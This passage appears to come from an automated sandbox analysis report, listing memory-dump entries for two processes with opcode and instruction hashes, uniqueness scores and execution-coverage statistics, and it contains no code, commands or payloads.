                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84A11C74A19E0C8FDBA9EF5DC4C9BA9B7E0FB6D301F114559D589D32A2CA30E840CB52
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d073ea6415d0db3c17bdc8a98aebfe16329abf3a99ce1380e324cf6d63500e2d
                                                                                                                                                                                                                                                  • Instruction ID: 24f6a48079599a2090f5b5da56bcbb71e61043e0b6c59ea6b4e7878dd933cb50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d073ea6415d0db3c17bdc8a98aebfe16329abf3a99ce1380e324cf6d63500e2d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5741543181CF848BE3298B5C9946BB6B3E4FB6D304F04970DE9CE91052DF71B5A68686
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d0eaa389417a297514ba406972abe5c67d5c474a303992de1aae04ac59a65431
                                                                                                                                                                                                                                                  • Instruction ID: 57cb56ed0a79f370687ecf08750ceb6f4c0451104978ad7121bde889a4894247
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0eaa389417a297514ba406972abe5c67d5c474a303992de1aae04ac59a65431
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1241F970709E088FDBA8EF1DD081FA5B3E1EB6A704F50099DD48DD7692C632E851DB42
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6ddf099b04ed4c520c7181b7dabb50bf80a25656aa7a09b37d330ab1ef30c892
                                                                                                                                                                                                                                                  • Instruction ID: 4d0363c40925ed6b4d3ffcaf2fc53dc9ab5da2199d7dcc02a1037c747e62e3e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ddf099b04ed4c520c7181b7dabb50bf80a25656aa7a09b37d330ab1ef30c892
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7413F34F19E098FDB95EF6CC185BA9B7E1FB5D300F50486D944AD3296C630E880CB92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b51a92f09b4acb07c4ffd6f45a2083d73a9e01bd2c3bef09065cd94cd88a9648
                                                                                                                                                                                                                                                  • Instruction ID: 3e7aa6d3f3344c58f6a19b6d21f73b31296b2b4fb6c112debd794d8d24a5c7c2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b51a92f09b4acb07c4ffd6f45a2083d73a9e01bd2c3bef09065cd94cd88a9648
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5310C30619E098FDBA8EF59D8C5AA9B7E0FB6D701F50051DE58AC3652DB30F850CB92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5da719434b85376a9c3353510d37723e1c2281e201ff7781b00b3def157fba24
                                                                                                                                                                                                                                                  • Instruction ID: f1455910cf07279470a12361f8b4cb5b74efb59f6fa1b38ac13ac51e8bd76d48
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5da719434b85376a9c3353510d37723e1c2281e201ff7781b00b3def157fba24
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03313C70A18E098FCB94EF19D4C5BA9B7E1FB6C701F40455EE55DD3662DA30E8408B92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fe14b9279ba77926b90e1d41dbcc05c6be5d4765db607cd81b5b2c4368556dfc
                                                                                                                                                                                                                                                  • Instruction ID: 5174581fd051976854745859cea7c12e54fa64cb9032d7eb37274b5eae20bf65
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe14b9279ba77926b90e1d41dbcc05c6be5d4765db607cd81b5b2c4368556dfc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F213B30B18E088FCBA4EF1CC585BA9B7E1FB6D701F404459E44EC3696CA30F8908B92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 681b9a4a800e0ef6be880e6bd348049ae75e5febe25d3c7d46c93ab8f3283d3e
                                                                                                                                                                                                                                                  • Instruction ID: dce46d15484635aec37cfd1212629becf29a0c6d7377c39173457f3f9e94aa70
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 681b9a4a800e0ef6be880e6bd348049ae75e5febe25d3c7d46c93ab8f3283d3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17210A30619F099FDB98EF19D8C6AA9B7E0FB2E700F904559E44983655DA30F850CBD3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fc9ef544748c2a7be3db899d38eee1f136acb3edcc09006209ad3aeed25d80bb
                                                                                                                                                                                                                                                  • Instruction ID: fc8a51d4738cc2fdbd4cdec4981ffb34b63a20afb390d04d5874609220ca65bd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc9ef544748c2a7be3db899d38eee1f136acb3edcc09006209ad3aeed25d80bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81113832A18F0D8FE63ADB18D94C7A6B3D5FB9B311F12466AD48AC3592C9B5A4834341
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 281563b09eed1ecd67925fc7cb5515647ad93059964e2b5664bcd1f42ec34015
                                                                                                                                                                                                                                                  • Instruction ID: b7a77d54eed7326f69c55f6a81f96a6c61cbe4281e0757c5548d959478dd1969
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 281563b09eed1ecd67925fc7cb5515647ad93059964e2b5664bcd1f42ec34015
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9421AB34A09E088FEBA9EB6DD089E95B3E0FB59300F14095DE08AD3693DB31E440DB55
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 389c0b391266fb34b118ce1c8e38fd79864fcb64dcc735da8690d9e933070e9f
                                                                                                                                                                                                                                                  • Instruction ID: 82bdc94ee1b34e712b581b3bde9633a0ae41ff1d23f71535cacdf4c3cf5585b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 389c0b391266fb34b118ce1c8e38fd79864fcb64dcc735da8690d9e933070e9f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD21D630608E099FCBA8EF19D0C5AA9B7E0FB6D700F404659E45EE3656CA31F850CBD2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 294c55edbca61f3c6331db7b14e3055d684de7df479dab46e0387f7a4e1d1996
                                                                                                                                                                                                                                                  • Instruction ID: 55c9b2014bc2c9b34736b1a29cc17138da193f03ebd21c5018e1363b906762fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 294c55edbca61f3c6331db7b14e3055d684de7df479dab46e0387f7a4e1d1996
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C214530619E049FDBA4EF28D5C5A99B7E4FB5D700F50094DE48EC3696DA30EC908B93
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8f7385ecc7052596c4579bc6f7983ea8f9df5870c898fa1959efe4d608000910
                                                                                                                                                                                                                                                  • Instruction ID: b6b370543c3d4b26bcb1c3a339d48b12eba7ecfa6ea116d39330cbb8e2cfcd58
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7385ecc7052596c4579bc6f7983ea8f9df5870c898fa1959efe4d608000910
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0021F134619E088FDAA8EB2DD184B66B3E1FB59301F50055DE48FC7A92DB31F881DB51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ee72ad6feeeaf353972647b08f3706037533ac3c7dd2f60eef1c1ca0139d7d69
                                                                                                                                                                                                                                                  • Instruction ID: 33b8cd81b5e0048545cf318ab18ddc511c3d3de5f588750da1b558813ecc2f6b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee72ad6feeeaf353972647b08f3706037533ac3c7dd2f60eef1c1ca0139d7d69
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF11FB30658F099BCF54FF19D4C6A99B7E0FB2D700F400959E48A93652C630F8908BD3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 939c02088d8388d08030f0f1799d511c4131753c51de703cc4fde00347fef22e
                                                                                                                                                                                                                                                  • Instruction ID: 55f2596ce0b2db04b17543bf08af1629ec0c6fbbb555387b92416cc974f7b0c9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939c02088d8388d08030f0f1799d511c4131753c51de703cc4fde00347fef22e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18111234618E0D9FDBA4FF28C585B99B3E0FB1D700F400958E49AD3642DA31F8508B93
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  • Instruction ID: 342db2ddbc729205494d8abe117aee4c9a16551de3e37eb3f5291d87d68f11f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7457c68f46af2a6c965656653ca460f532db7bb49719e327d295308b94c2cfb2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F01230618E488FDA68EB29E584B65B3E4FB59301F40065DD48FD3B96DB31F840CB92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: efe935bd24665c51879672f4331060966107a324a16d76755ed1132a49a661b6
                                                                                                                                                                                                                                                  • Instruction ID: b3f1f55cea0b5abb36f6fdef45746002881edd09dc9c62608f8bceea3c289f10
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efe935bd24665c51879672f4331060966107a324a16d76755ed1132a49a661b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F01C30529E488FC7A4FF28D45DA69B7E4FB08301F41095DE89BC3662DE31E890CB52
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b3149675bec359778621e55aa097ca3ef089accbb9589f343f34adfbaa40d01b
                                                                                                                                                                                                                                                  • Instruction ID: 8f2d699b0583ea744c8d3af92bf282181243c29c13f87d69c247a50966ff16c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3149675bec359778621e55aa097ca3ef089accbb9589f343f34adfbaa40d01b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF06D30A08D0CCFCAA8FF28D484F65B3E4FB19700F400659E89ED3652DA22F850CB92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8317faab50ac7c66a26191dae70fa7813a513e9a1bcdd42a8d2a072177619137
                                                                                                                                                                                                                                                  • Instruction ID: 78ed70323b3e0ae9a1310ec065fc3aa5d75fa5babfc667ec4d7ae8734b514e2e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8317faab50ac7c66a26191dae70fa7813a513e9a1bcdd42a8d2a072177619137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F03030618E0C8FCAE4FF29D184B6573E4FB19300F50494DF89EC3646D631E8918B42
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7f40abab4a395220209bb204973762990f79d5169fd941662469a31ced271609
                                                                                                                                                                                                                                                  • Instruction ID: 33ac52870501a77609cc6296959a38845bf693649cb0d6a64e3bb9f147bd8e9f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f40abab4a395220209bb204973762990f79d5169fd941662469a31ced271609
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78E01D7164CB086FD1188559BC467B273E4E74D735F20451EF59E8358299127801465E
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14b40c784dce6d689c495226e21d619e7de06de0ce478d24940a191bdb754341
                                                                                                                                                                                                                                                  • Instruction ID: eb5dc43acb2972d5923e49742a6ba3d802f4e5582009c2b62c92320f282a3fec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b40c784dce6d689c495226e21d619e7de06de0ce478d24940a191bdb754341
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87E01234926F884BD668FF7459463AAB3D4F70A700F800959E89B83543D570A4A186A3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f3b51583ab959a0629488c3ac10a70ebcf6a9633a7c434bba773dc378663a834
                                                                                                                                                                                                                                                  • Instruction ID: 0b1ebed766cbe6142af7ca07ce24d40177c9a9d8e48d35b41b566d3047df3cb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3b51583ab959a0629488c3ac10a70ebcf6a9633a7c434bba773dc378663a834
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6D05B34965F084BC5B1FF7459863A973D4FB0E700F800569E89B82547DA31E450C6A3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4d985430cd642aafd0e1857dc8a02a792aebe8b2a401ec30d1c939ee80d7184e
                                                                                                                                                                                                                                                  • Instruction ID: 800a88831f69d183b72f2cc1abf3b2c126ec7b3df7010754ea813fbc05d10aac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d985430cd642aafd0e1857dc8a02a792aebe8b2a401ec30d1c939ee80d7184e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DC01234E15D584BE1B5EAA861053E97394E70B700F800549D89F81983D911A850CDA3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:6.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:52
                                                                                                                                                                                                                                                  Total number of Limit Nodes:9

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 1$v
                                                                                                                                                                                                                                                  • API String ID: 0-2456183578
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 1$v
                                                                                                                                                                                                                                                  • API String ID: 0-2456183578
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
